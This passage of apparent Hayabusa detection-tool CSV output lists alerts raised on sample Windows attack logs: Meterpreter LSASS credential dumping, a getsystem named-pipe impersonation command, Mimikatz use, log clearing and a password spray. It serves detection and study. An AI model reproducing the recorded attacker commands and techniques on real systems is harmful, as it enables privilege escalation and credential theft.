Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named 
Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 
+09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 
+09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 
+09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:cspizor/bgreenwood/baker/dpendolino/melliott/cfleener/sarmstrong/sanson/lpesce/wstrzelec/drook/thessman/mtoussain/jorchilles/ssims/bhostetler/dmashburn/edygert/cmoody/tbennett/cdavis/zmathis/eskoudis/jleytevidal/jwright/bgalbraith/psmith/lschifano/celgee/kperryman/bking/cragoso/rbowes/jkulikowski/jlake/econrad/smisenar/mdouglas/gsalinas/Administrator/ebooth IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 